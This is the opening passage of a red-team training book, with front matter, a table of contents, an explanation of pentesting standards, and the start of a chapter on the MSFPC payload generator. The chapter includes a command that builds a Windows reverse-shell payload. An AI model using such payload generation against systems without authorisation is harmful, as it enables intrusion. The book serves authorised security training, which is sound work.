Hands-On Red Team Tactics E-Book

Hands-On Red Team Tactics

Copyright © 2018 Packt Publishing

All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.

Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the authors, nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book.

Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information.

Commissioning Editor: Vijin BorichaAcquisition Editor:Rohit RajkumarContent Development Editor:Ronn KurienTechnical Editor:Prachi SawantCopy Editor:Safis EditingProject Coordinator:Jagdish PrabhuProofreader: Safis EditingIndexer:Tejal Daruwale SoniGraphics:Tom ScariaProduction Coordinator: Deepika Naik

First published: September 2018

Production reference: 1270918

Published by Packt Publishing Ltd. Livery Place 35 Livery Street Birmingham B3 2PB, UK.

ISBN 978-1-78899-523-8

www.packtpub.com

Mapt is an online digital library that gives you full access to over 5,000 books and videos, as well as industry leading tools to help you plan your personal development and advance your career. For more information, please visit our website.

Why subscribe?

Spend less time learning and more time coding with practical eBooks and Videos from over 4,000 industry professionals

Improve your learning with Skill Plans built especially for you

Get a free eBook or video every month

Mapt is fully searchable

Copy and paste, print, and bookmark content

Packt.com

Did you know that Packt offers eBook versions of every book published, with PDF and ePub files available? You can upgrade to the eBook version at www.packt.com and as a print book customer, you are entitled to a discount on the eBook copy. Get in touch with us at [email protected] for more details.

At www.packt.com, you can also read a collection of free technical articles, sign up for a range of free newsletters, and receive exclusive discounts and offers on Packt books and eBooks. 

Contributors

About the authors

Himanshu Sharma has already achieved fame for finding security loopholes and vulnerabilities in Apple, Google, Microsoft, Facebook, Adobe, Uber, AT&T, Avira, and many more with hall of fame listings. He has helped celebrities such as Harbhajan Singh in recovering their hacked accounts, and also assisted an international singer in recovering his hacked accounts. He was a speaker at the international conference Botconf '13, CONFidence 2018 and RSA Singapore 2018. He also spoke at IEEE Conference as well as for TedX. Currently, he is the cofounder of BugsBounty, a crowd-sourced security platform.

Harpreet Singh has more than 5 years experience in the field of Ethical Hacking, Penetration Testing, and Red Teaming. In addition, he has performed red team engagement in multi-national banks and companies. Harpreet is a Offensive Security Certified Professional (OSCP) and Offensive Security Wireless Professional (OSWP). He has trained 1500+ students including Govt. officials in International projects.

About the reviewers

Nipun Jaswal is an International Cyber Security Author and an award-winning IT security researcher with a decade of experience in penetration testing, vulnerability assessments, surveillance and monitoring solutions, and RF and wireless hacking.He has authored Metasploit Bootcamp, Mastering Metasploit, and Mastering Metasploit—Second Edition, and coauthored the Metasploit Revealed set of books. He has authored numerous articles and exploits that can be found on popular security databases, such as packet storm and exploit-db. Please feel free to contact him at @nipunjaswal.

Ashwin Iyer is an M.Tech Graduate in Information Security and Computer Forensics with more than 5 years  of experience in Cyber Security and earned a bachelor's degree in computer science. He has exposure to penetration testing and infrastructure security.

He is currently working at SAP ARIBA, as a Red Team Lead. He has experience in Infrastructure Security, Harden the underlying technology / OS / Device. He is also experienced in web and network pentest—both e-commerce and software product domains.

He has got professional certifications in GIAC GSEC #35151 (SANS), OSCP Certified OS-13175, ISO 27001:2013, ITILv3 2011 Foundation, Certified Ethical Hacker (CEHv7), CISRA.

Packt is searching for authors like you

If you're interested in becoming an author for Packt, please visit authors.packtpub.com and apply today. We have worked with thousands of developers and tech professionals, just like you, to help them share their insight with the global tech community. You can make a general application, apply for a specific hot topic that we are recruiting an author for, or submit your own idea.

Table of Contents

Title Page

Copyright and Credits

Hands-On Red Team Tactics

Packt Upsell

Why subscribe?

Packt.com

Contributors

About the authors

About the reviewers

Packt is searching for authors like you

Preface

Who this book is for

What this book covers

To get the most out of this book

Download the color images

Conventions used

Get in touch

Reviews

Disclaimer

Red-Teaming and Pentesting

Pentesting 101

OWASP

Open Source Security Testing Methodology Manual (OSSTMM)

Information Systems Security Assessment Framework (ISSAF)

Penetration Testing Execution Standard (PTES)

Pre-engagement interactions

Intelligence gathering

Threat modeling

Vulnerability analysis

Exploitation

Post-exploitation

Reporting

A different approach

Methodology

How is it different?

Summary

Questions

Further reading

Pentesting 2018

Technical requirements

MSFvenom Payload Creator

Resource file

Koadic

Installation

Why use MSHTA as the dropper payload?

Terminology

Stager establishment

Payload execution

Running Implants

Pivoting

Summary

Questions

Further reading

Foreplay - Metasploit Basics

Technical requirements

Installing Metasploit

Running Metasploit

Auxiliaries

Exploits

Payloads

Encoders

Meterpreter

Armitage and team server

Metasploit with slack

Armitage and Cortana scripts

Summary

Questions

Further reading

Getting Started with Cobalt Strike

Technical requirements

Planning a red-team exercise

Cyber kill chain (CKC)

Reconnaissance

Weaponization

Delivery

Exploitation

Installation

Command and Control Server

Actions

Objective and goal

Rules of Engagement (RoE)

Scenario/strategy

Deliverables

Introduction to Cobalt Strike

What is a team server?

Cobalt Strike setup

Cobalt Strike interface

Toolbar

Connecting to another team server

Disconnecting from the team server

Configure listeners

Session graphs

Session table

Targets list

Credentials

Downloaded files

Keystrokes

Screenshots

Payload generation – stageless Windows executable

Payload generation – Java signed applet

Payload generation – MS Office macros

Scripted web delivery

File hosting

Managing the web server

Server switchbar

Customizing the team server

Summary

Questions

Further reading

./ReverseShell

Technical requirement

Introduction to reverse connections

Unencrypted reverse connections using netcat

Encrypted reverse connections using OpenSSL

Introduction to reverse shell connections

Unencrypted reverse shell using netcat

Encrypted reverse shell for *nix with OpenSSL packages installed

Encrypted reverse shell using ncat

Encrypted reverse shell using socat

Encrypted reverse shell using cryptcat

Reverse shell using powercat

reverse_tcp

reverse_tcp_rc4

reverse_https

reverse_https with a custom SSL certificate

Meterpreter over ngrok

Reverse shell cheat sheet

Bash reverse shell

Zsh reverse shell

TCLsh/wish reverse shell

Ksh reverse shell

Netcat reverse shell

Telnet reverse shell

(G)awk reverse shell

R reverse shell

Python reverse shell

Perl reverse shell

Ruby reverse shell

Php reverse shell

Lua reverse shell

Nodejs reverse shell

Powershell reverse shell

Socat reverse shell over TCP

Socat reverse shell over UDP

Socat reverse shell over SSL (cert.pem is the custom certificate)

Summary

Questions

Further reading

Pivoting

Technical requirements

Pivoting via SSH

Meterpreter port forwarding

Pivoting via Armitage

Multi-level pivoting

Summary

Further reading

Age of Empire - The Beginning

Technical requirements

Introduction to Empire

Empire setup and installation

Empire fundamentals

Phase 1 – Listener Initiation

Phase 2 – Stager Creation

Phase 3 – Stager Execution

Phase 4 – Acquiring Agent

Phase 5 – Post Module Operations

Empire post exploitation for Windows

Empire post exploitation for Linux

Empire post exploitation for OSX

Popping up a Meterpreter session using Empire

Slack notification for Empire agents

Summary

Questions

Further reading

Age of Empire - Owning Domain Controllers

Getting into a Domain Controller using Empire

Automating Active Directory exploitation using the DeathStar

Empire GUI

Summary

Questions

Further reading

Cobalt Strike - Red Team Operations

Technical requirements

Cobalt Strike listeners

Foreign-based listeners

Cobalt Strike payloads

Beacons

The beacon menu

Explore menu

Beacon console

Pivoting through Cobalt Strike

Aggressor Scripts

Summary

Questions

Further reading

C2 - Master of Puppets

Technical requirements

Introduction to C2

Cloud-based file sharing using C2

Using Dropbox as the C2

Using OneDrive as the C2

C2 covert channels

TCP

UDP

HTTP(S)

DNS

ICMP

Summary

Questions

Further reading

Obfuscating C2s - Introducing Redirectors

Technical requirements

Introduction to redirectors

Obfuscating C2 securely

Short-term and long-term redirectors

Redirection methods

Dumb pipe redirection

Filtration/smart redirection

Domain fronting

Summary

Questions

Further reading

Achieving Persistence

Technical requirements

Persistence via Armitage

Persistence via Empire

Persistence via Cobalt Strike

Summary

Further reading

Data Exfiltration

Technical requirements

Exfiltration basics

Exfiltration via Netcat

Exfiltration via OpenSSL

Exfiltration with PowerShell

CloakifyFactory

Running CloakifyFactory on Windows

Data exfiltration via DNS

Data exfiltration via Empire

Summary

Questions

Further reading

Assessment

Chapter 1: Red-Teaming and Pentesting

Chapter 2: Pentesting 2018

Chapter 3: Foreplay – Metasploit Basics

Chapter 4: Getting Started with Cobalt Strike

Chapter 5: ./ReverseShell

Chapter 7: Age of Empire – The Beginning

Chapter 8: Age of Empire – Owning Domain Controllers

Chapter 9: Cobalt Strike – Red Team Operations

Chapter 10: C2 – Master of Puppets

Chapter 11: Obfuscating C2s – Introducing Redirectors

Chapter 13: Data Exfiltration

Other Books You May Enjoy

Leave a review - let other readers know what you think

Preface

Red Teaming is used to enhance security by performing simulated attacks on the organization in order to detect network and system vulnerabilities. Hands-On Red Team Tactics starts with an overview of pentesting and Red Teaming, before giving an introduction of few of the latest pentesting tools. You will then move on to exploring Metasploit and getting to grips with Armitage. Once you have studied the basics, you will understand Cobalt Strike basic, usage and how to set up a team server of Cobalt Strike.

You will discover some common lesser known techniques for pivoting and how to pivot over SSH, before using Cobalt Strike to pivot. This comprehensive guide demonstrates the advanced methods of post-exploitation using Cobalt Strike and introduces you to Command-and-control servers (C2) and Redirectors. All this will help you achieve persistence using Beacons and Data Exfiltration, and will also give you the chance to run through the methodology to use Red Team activity tools like Empire during a Red Team activity on Active Directory and Domain Controller.

By the end of the book, you will have learned advanced penetration testing tools, techniques to get reverse shells over encrypted channels and processes for post-exploitation. In addition to this, you will explore frameworks such as Empire which include maintaining persistent access, staying untraceable, and getting reverse connections over different C2 covert channels.

Who this book is for

Hands-On Red Team Tactics is for you if you are an IT professional, pentester, security consultant, or ethical hacker interested in the IT security domain and wants to go beyond Penetration Testing. Prior knowledge of penetration testing is beneficial.

What this book covers

Chapter 1, Red-Teaming and Pentesting, helps you understand about different standards of pentesting followed across the industry, and we went through the seven phases of the PTES standard in detail.

Chapter 2, Pentesting 2018, introduces you to MSF Payload Creator (MSFPC). We will also look at the use of resource fileswhich were generated by MSFPC besides the payload file

Chapter 3, Foreplay – Metasploit Basics, teaches you about team server and the Armitage client, including the setup and usage of Armitage.

Chapter 4, Getting Started with Cobalt Strike, starts by exploring the red-team exercise as well as the concept of the cyber kill chain, which can be used for an attack plan. The chapter then introduces you to Cobalt Strike, the tool that is used for red-team operations.

Chapter 5, ./ReverseShell, explores what a reverse connection and reverse shell connection is using various tools. Furthermore, we will try different payloads to get reverse shell connections using Metasploit.

Chapter 6, Pivoting, dives into port forwarding and its uses. We will also learn about pivoting and its uses, followed by methods of port forwarding via SSH.

Chapter 7, Age of Empire – The beginning, introduces you to Empire and its fundamentals. We will also cover Empire's basic usage and the post exploitation basics for Windows, Linux and OSX.

Chapter 8, Age of Empire – Owning Domain Controllers, delves into some more advanceduses of the Empire tool to get access to the Domain Controller.

Chapter 9, Cobalt Strike – Red Team Operations, teaches you about the listener module of Cobalt Strike along with its type and usage.

Chapter 10, C2 – Master of Puppets, provides an introduction to command and control (C2) servers and discussed how they are used in a red team operation.

Chapter 11, Obfuscate C2s – Introducing Redirectors, introduces you to redirectors and the reason why obfuscating C2s are required. We have also covered how we can obfuscate C2s in a secure manner so that we can protect our C2s from getting detected by the Blue team.

Chapter 12, Achieving Persistence, dives into achieving persistence using Armitage's inbuilt exploit modules, then we will learn how to do the same via Empire on Windows, Linux, and macOS machines.

Chapter 13, Data Exfiltration, discusses about some basic ways of transferring data using simple tools like Netcat, OpenSSL and PowerShell. Next, we jumped into transforming the data using text-based steganography to avoid detection, as well as looking at the usage of the CloakifyFactory tool.

To get the most out of this book

The readers should have prior knowledge to networking basics, Linux basic commands, Penetration Testing standards and hands-on experience in using tools such as Metasploit, Nmap, and so on.

The readers should have at least Linux installed for Red Team Engagement. Kali is recommended as it comes with pre-configured tools.

Download the color images

We also provide a PDF file that has color images of the screenshots/diagrams used in this book. You can download it here: https://www.packtpub.com/sites/default/files/downloads/9781788995238_ColorImages.pdf.

Conventions used

There are a number of text conventions used throughout this book.

CodeInText: Indicates code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles. Here is an example: "Let's try to use thebackdoor_lnk module by typinginfo."

Any command-line input or output is written as follows:

git clone https://github.com/g0tmi1k/mpc

Bold: Indicates a new term, an important word, or words that you see onscreen. For example, words in menus or dialog boxes appear in the text like this. Here is an example: "Click theAdd an appbutton to add an application."

Get in touch

Feedback from our readers is always welcome.

General feedback: If you have questions about any aspect of this book, mention the book title in the subject of your message and email us at [email protected].

Errata: Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you have found a mistake in this book, we would be grateful if you would report this to us. Please visit www.packt.com/submit-errata, selecting your book, clicking on the Errata Submission Form link, and entering the details.

Piracy: If you come across any illegal copies of our works in any form on the Internet, we would be grateful if you would provide us with the location address or website name. Please contact us at [email protected] with a link to the material.

If you are interested in becoming an author: If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, please visit authors.packtpub.com.

Reviews

Please leave a review. Once you have read and used this book, why not leave a review on the site that you purchased it from? Potential readers can then see and use your unbiased opinion to make purchase decisions, we at Packt can understand what you think about our products, and our authors can see your feedback on their book. Thank you!

For more information about Packt, please visit packt.com.

Disclaimer

The information within this book is intended to be used only in an ethical manner. Do not use any information from the book if you do not have written permission from the owner of the equipment. If you perform illegal actions, you are likely to be arrested and prosecuted to the full extent of the law. Packt Publishing does not take any responsibility if you misuse any of the information contained within the book. The information herein must only be used while testing environments with proper written authorizations from appropriate persons responsible.

Red-Teaming and Pentesting

Pentesting is an attack on a computer system, done to evaluate the security of the system/network. This test is performed to identify vulnerabilities and the risks they possess.

The 1960's marked the true beginning of the age of computer security. In this chapter, we will cover the methodology of pentesting that is widely used, as well as the red-teaming approach, which is now being adopted across different corporations.

In this chapter, we will cover the following topics:

Pentesting 101

A different approach

Pentesting 101

As we all know, penetration testing follows a standard. There are various standards, such as the Open Web Application Security Project (OWASP), the Open Source Security Testing Methodology Manual (OSSTMM), the Information Systems Security Assessment Framework (ISSAF), and so on. Most of them follow the same methodology, but the phases have been named differently. We will take a look at each of them in the following sections and cover the Penetration Testing Execution Standards (PTES) in detail.

OWASP

OWASP is a worldwide not-for-profit charitable organization that focuses on improving the security of software.

It's a community of like-minded professionals who release software and knowledge-based documentation on application security, covering such subjects as:

Information gathering

Configuration and deployment management testing

Identity management testing

Authentication testing

Authorization testing

Session management testing

Input validation testing

Error handling

Cryptography

Business logic testing

Client-side testing

Open Source Security Testing Methodology Manual (OSSTMM)

As mentioned on their official website, this is a peer-reviewed manual of security testing and analysis, providing verified facts. These facts provide actionable information that can measurably improve your operational security.

The OSSTMM includes the following key sections:

Operational security metrics

Trust analysis

Work flow

Human security testing

Physical security testing

Wireless security testing

Telecommunications security testing

Data networks security testing

Compliance regulations

Reporting with the

Security Test Audit Report

(

STAR

)

Information Systems Security Assessment Framework (ISSAF)

ISSAF is not very active, but the guide it has provided is quite comprehensive. It aims to evaluate the information security policy and process of an organization with regard to its compliance with IT industry standards, along with laws and regulatory requirements. The current version of ISSAF is 0.2.

The stages that it covers can be found at https://www.owasp.org/index.php/Penetration_testing_methodologies.

Penetration Testing Execution Standard (PTES)

This standard is the most widely used standard and covers almost everything related to pentesting.

PTES is divided into the following seven phases:

Pre-engagement interactions

Intelligence gathering

Threat modeling

Vulnerability analysis

Exploitation

Post-exploitation

Reporting

Let's take a brief look at what each of these phases involves.

Pre-engagement interactions

These actions involve multiple processes to be carried out before an activity kicks off, such as defining the scope of the activity, which usually involves mapping the network IPs, web applications, wireless networks, and so on.

Once the scoping is done, lines of communication are established across both the vendors and the incident reporting process is finalized. These interactions also include status updates, calls, legal processes, and the start and end dates of the project.

Intelligence gathering

This is a process that is used to gather as much as information as possible about the target. This is the most critical part of pentesting, as the more information we have, the more attack vectors we can plan to perform the activity. In case of a whitebox activity, all this information is already provided to the testing team.

Threat modeling

Threat modeling model depends on the amount of information gathered. Depending on that, the activity can be divided and then performed using automated tools, logical attacks, and so on. The following diagram illustrates an example of a mindmap of a threat model:

Vulnerability analysis

This is a process of discovering flaws that can be used by an attacker. These flaws can be anything ranging from open ports/service misconfiguration to an SQL injection. There are lots of tools available that can help in performing a vulnerability analysis. 

These include Nmap, Acunetix, and Burp Suite. We can also see new tools being released every few weeks.

Exploitation

This is a process of gaining access to the system by evading the protection mechanism on the system based on the vulnerability assessment. Exploits can be public, or a zero day.

Post-exploitation

This is a process where the goal is to determine the criticality of the compromise and then maintain access for future use. This phase must always follow the rules of the engagement that is protecting the client and protecting ourselves (covering the tracks as per the activity's requirements).

Reporting

This is one of the most important phases, as the patching of all the issues totally depends on the details presented in the report. The report must contain three key elements:

Criticality of the bug

Steps of reproduction of the bug

Patch suggestions

In summary, the pentest life cycle phases are presented in the following diagram:

A different approach

Let's discuss a different approach: red-teaming. The main objective of red-teaming is to assess and obtain the real level of risk a company has at that moment in time. In this activity, networks, applications, physical, and people (social engineering) are tested against weaknesses.

Red-teaming can also be considered as a simulation of a real-world hack.

Methodology

Red-teaming is based on the PTES standard as the foundation. However, there's much more to it. It can be said that the penetration testing activity is performed with the aim of finding as many vulnerabilities in the given amount of time as possible. However, red-teaming is performed with only one goal and by staying discreet.

The methodology used in a red-team activity involves the following:

Reconnaissance

Compromise

Persistence

Command and control

Privilege escalation

Pivoting

Reporting and cleanup

The following cycle basically repeats for every new piece of information that is found about the client until the goal is met:

How is it different?

Let's look at it with a different perspective to get a clearer picture:

Looking at the preceding diagram, we can see that red-teaming involves using every means to achieve the goals. We can summarize the major difference between red-teaming and pentesting as follows:

Red-teaming involves finding and exploiting only those vulnerabilities that help to achieve our goal, whereas pentesting involves finding and exploiting vulnerabilities in the given scope, which is limited to digital assets

Red-teaming has an extremely flexible methodology, whereas pentesting has fixed static methods

During red-teaming, the security teams of the organizations have no information about it, whereas during pentesting, security teams are notified

Red-teaming attacks can happen 24/7, while pentesting activities are mostly limited to office hours

Red-teaming is more about measuring the business impact of the vulnerabilities, whereas pentesting is about finding and exploiting vulnerabilities.

Summary

Wrapping up the chapter, we learned about different standards of pentesting followed across the industry, and we went through the seven phases of the PTES standard in detail. We also looked at red-teaming and how it is different from pentesting.

In the next chapter, we will look at a few of the latest post-exploitation tools and examine in detail how they work.

Questions

What are the different pentesting standards?

What are the different phases of PTES?

What is the difference between red-teaming and pentesting?

What are the key elements of a report?

What is the main objective of a red-team activity?

Further reading

For more information on the topics discussed in this chapter, please visit the following links:

High Level Organization of the Standard

:

http://www.pentest-standard.org/index.php/Main_Page

OSSTMM

:

http://www.isecom.org/mirror/OSSTMM.3.pdf

Web Application Penetration Testing

:

https://www.owasp.org/index.php/Web_Application_Penetration_Testing

Information Systems Security Assessment Framework (ISSAF)

:

http://www.oissg.org/issaf02/issaf0.1-5.pdf

InfoSec Resources

:

https://resources.infosecinstitute.com/the-history-of-penetration-testing/#gref

Pentesting 2018

For the past few years, we have been using tools such as the Metasploit Framework, routersploit, LinuxEnum.sh, nmap, and so on for post-exploitation and scanning. With the growing popularity of new tools, it would be good to learn about some new tools that can be used for post-exploitation. Out of the many available tools, we will be looking at MSFvenom Payload Creator (MSFPC)—a simple MSF-based payload generator; and Koadic—a COM-based Command and Control (C3) server, which can be used in red-team operations or penetration testing for post-exploitation.

In this chapter, we will cover the following tools:

MSFPC

Kaodic

Technical requirements

*nix-based system (Kali, Ubuntu, or macOS X)

The Metasploit framework (needed for MSFPC)

Python package version 2 or 3 (needed for Koadic)

MSFvenom Payload Creator

MSFvenom Payload Creator (MSFPC) is a user-friendly multiple payload generator that can be used to generate Metasploit payloads based on user-selected options. The user doesn't need to execute the long msfvenom commands to generate payloads anymore. With MSFPC, the user can generate the payloads with far fewer commands.

Before downloading the tool, Metasploit should be installed in the system. MSFPC is just a simple bash script, which means that it can be executed on *nix systems.

We can download the MSFPC package from https://github.com/g0tmi1k/mpc. We can either download the repository in a ZIP file or we can clone the repository on our local system by running the following command:

git clone https://github.com/g0tmi1k/mpc

After cloning the repo, let's issue an execute permission on msfpc.sh file.

cd mpc/chmod +x msfpc.sh ./msfpc.sh./msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)

TYPE

: The payload could be of any of the following formats (this option is the same as the

-f

switch in

msfvenom

):

APK [android]

,

ASP

,

ASPX

,

Bash [.sh]

,

Java [.jsp]

,

Linux [.elf]

,

OSX [.macho]

,

Perl [.pl]

,

PHP

,

Powershell [.ps1]

,

Python [.py]

,

Tomcat [.war]

,

Windows [.exe //.dll]

.

DOMAIN/IP

: This is the

LHOST

option when generating payloads in

msfvenom

.

PORT

: This is the

LPORT

option when generating payloads in

msfvenom

.

CMD/MSF

: This is the type of shell dropped once the payload is executed on the target system. The

CMD

option can be used when you want to get a standard command shell; that is, the Command Prompt shell (

cmd.exe

) for Windows and Terminal (

/bin/bash

) for *nix. In some cases, where the size of the shellcode matters, it's better to use the classic reverse shell payload.

CMD

can be used in situations like these.

Generating a simple classic reverse shell payload can be done by executing the following command:

sh msfpc.sh cmd windows en0

The preceding command will generate a payload with a cmd as the preferred shell for Windows and set the LHOST to the IP retrieved from the en0 Ethernet interface:

As you can see from the preceding screenshot, MSFPC created two files in the same directory:

The executable payload

:

windows-shell-staged-reverse-tcp-443.exe

The resource file

:

windows-shell-staged-reverse-tcp-443-exe.rc

The naming convention for the files are easy to understand as they are named after the options used while creation. We just created a Windows staged